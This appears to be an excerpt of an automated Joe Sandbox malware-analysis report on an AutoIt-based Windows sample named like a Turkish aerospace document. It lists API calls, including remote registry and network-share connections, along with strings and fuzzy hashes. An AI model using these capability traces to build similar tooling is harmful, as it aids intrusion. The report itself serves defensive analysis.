                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01002F7E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3993528054-0
                                                                                                                                    • Opcode ID: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                                                                                    • Instruction ID: 1751d5de09600351846814ec7b5265791dc5034c603d802415cfe5c1d3a38ad5
                                                                                                                                    • Opcode Fuzzy Hash: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                                                                                    • Instruction Fuzzy Hash: 7371D470640256BAFB329F58DC8DFAABFA8FF04754F10025AF695AA1D0C7B55C20C790
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • _memset.LIBCMT ref: 00FF786B
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FF78A0
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FF78BC
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FF78D8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FF7902
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FF792A
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF7935
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF793A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                                    • Opcode ID: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                                                                                    • Instruction ID: aae9560a9fbd9076c5affa744b3ae3a3cf39dc3110e7427097570d3e0254044d
                                                                                                                                    • Opcode Fuzzy Hash: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                                                                                    • Instruction Fuzzy Hash: 2E4108B2C1422DABCF21EFA4EC85DEEB778BF08750F404069F905A7261DA799D04DB90
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                    • Opcode ID: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                                                                                    • Instruction ID: 5e6d77a9e29a23603adb38883e6db7354a579b1fd1137346ea5b9190e61ac068
                                                                                                                                    • Opcode Fuzzy Hash: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                                                                                    • Instruction Fuzzy Hash: 9541583114435ACBCF81EE14DD56EEF3BA4BF01304F444448FCA51B696DB39996ADBA0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FDE2A0,00000010,?,Bad directive syntax error,0102F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FFF7C2
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE2A0,00000010), ref: 00FFF7C9
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • _wprintf.LIBCMT ref: 00FFF7FC
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF81E
                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FFF88D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                    • API String ID: 1506413516-4153970271
                                                                                                                                    • Opcode ID: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                                                                                    • Instruction ID: a1755a21311429ab1609e4c0fb4e5fea8d60aa9b83af68460324ff83779f6fd9
                                                                                                                                    • Opcode Fuzzy Hash: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                                                                                    • Instruction Fuzzy Hash: 9121717290021EABCF11EF91CC4AEFE7739BF18350F04446AF90566162DA759618EB51
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                      • Part of subcall function 00FA7924: _memmove.LIBCMT ref: 00FA79AD
                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01005330
                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01005346
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01005357
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01005369
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100537A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$_memmove
                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                                    • Opcode ID: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                                                                                    • Instruction ID: 297a5f32984bc6aa0e8531726822f32ea4a9e7487e665194bb13057491410009
                                                                                                                                    • Opcode Fuzzy Hash: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                                                                                    • Instruction Fuzzy Hash: D211C8B1A5421D79E760B667DC49DFF7BBCFB9AB40F40445ABC41960D1DAA04904C9B0
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                                    • Opcode ID: d1ca51933ad5df5fe2241a2a4118c4930b596b342d66ce8e06382eb498063ce3
                                                                                                                                    • Instruction ID: 7cd07a5b093b13b1346aa7a435a8a5001799e1b441933ea9d44677a9af90b112
                                                                                                                                    • Opcode Fuzzy Hash: d1ca51933ad5df5fe2241a2a4118c4930b596b342d66ce8e06382eb498063ce3
                                                                                                                                    • Instruction Fuzzy Hash: CF113531500116ABEB61AA34AC4AEDF77BCEB01311F0001AAF689D6091EF7989818B50
                                                                                                                                    APIs
                                                                                                                                    • timeGetTime.WINMM ref: 01004F7A
                                                                                                                                      • Part of subcall function 00FC049F: timeGetTime.WINMM(?,76C1B400,00FB0E7B), ref: 00FC04A3
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 01004FA6
                                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01004FCA
                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01004FEC
                                                                                                                                    • SetActiveWindow.USER32 ref: 0100500B
                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01005019
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 01005038
                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 01005043
                                                                                                                                    • IsWindow.USER32 ref: 0100504F
                                                                                                                                    • EndDialog.USER32(00000000), ref: 01005060
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                    • String ID: BUTTON
                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                    • Opcode ID: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                                                                                    • Instruction ID: e556d12b6f0ce6fa00e4299a1ea6ae0fd6024d4a8bfcba92b3e385493840b23c
                                                                                                                                    • Opcode Fuzzy Hash: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                                                                                    • Instruction Fuzzy Hash: D7216270204206AFF7329F34ED89F2A7BA9EB4A789F141018F6C5811E9CB6B4D508B61
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0100D5EA
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0100D67D
                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0100D691
                                                                                                                                    • CoCreateInstance.OLE32(01032D7C,00000000,00000001,01058C1C,?), ref: 0100D6DD
                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0100D74C
                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0100D7A4
                                                                                                                                    • _memset.LIBCMT ref: 0100D7E1
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0100D81D
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0100D840
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0100D847
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0100D87E
                                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0100D880
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1246142700-0
                                                                                                                                    • Opcode ID: 2374997776e46c8fba1face7c801e187108c2c81544bfcc83e4063142eca7505
                                                                                                                                    • Instruction ID: 9ba34da364805203c632b2937b7978b16b6acb29e35df0a6292eb3acdae3ea17
                                                                                                                                    • Opcode Fuzzy Hash: 2374997776e46c8fba1face7c801e187108c2c81544bfcc83e4063142eca7505
                                                                                                                                    • Instruction Fuzzy Hash: A0B11A75A00109AFDB14DFA4CC84DAEBBB9FF49314F1480A9E949EB251DB74EE41CB60
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00FFC283
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FFC295
                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FFC2F3
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00FFC2FE
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FFC310
                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FFC364
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FFC372
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FFC383
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FFC3C6
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00FFC3D4
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FFC3F1
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00FFC3FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                    • Opcode ID: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                                                                                    • Instruction ID: b9b96edc6179990c54d591a34d094dd853c0baaddbec63c1f7aa103c286ded65
                                                                                                                                    • Opcode Fuzzy Hash: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                                                                                    • Instruction Fuzzy Hash: 16513F71B00209ABDB28CFB9DD89AAEBBB6FF88750F14812DF615D7294D7719D008B50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FA20D3
                                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FA216E
                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00FDBCA6
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCD7
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCEE
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBD0A
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FDBD1C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                    • Opcode ID: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                                                                                    • Instruction ID: fc49ccbcbd08a5ee7134db09cf954bb13c01b46d9494f2e628d8057863ad3e49
                                                                                                                                    • Opcode Fuzzy Hash: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                                                                                    • Instruction Fuzzy Hash: E161B171A10601DFCB359F18D948B29B7F2FF41362F248519E4829BA64C77AA891EF90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA21D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                    • Opcode ID: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                                                                                    • Instruction ID: 16d667939f0c9c6b8db40b5e6ab860ce7f1073901231d50467a765d4c086a349
                                                                                                                                    • Opcode Fuzzy Hash: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                                                                                    • Instruction Fuzzy Hash: AD41A371600140DFEB715F2CD888BB93BA6EB07371F284255FEA58A1E5C7368C42EB21
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?,0102F910), ref: 0100A90B
                                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,010589A0,00000061), ref: 0100A9D5
                                                                                                                                    • _wcscpy.LIBCMT ref: 0100A9FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                                    • Opcode ID: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                                                                                    • Instruction ID: d3bd3960dac38eff9a7973133ceefd3b3288cb7aef860f41b2060735376026f9
                                                                                                                                    • Opcode Fuzzy Hash: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                                                                                    • Instruction Fuzzy Hash: DA51BC71218301EBD301EF18CD92AAFB7E5EF86340F04482DF9D65B2E2DB759909CA52
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
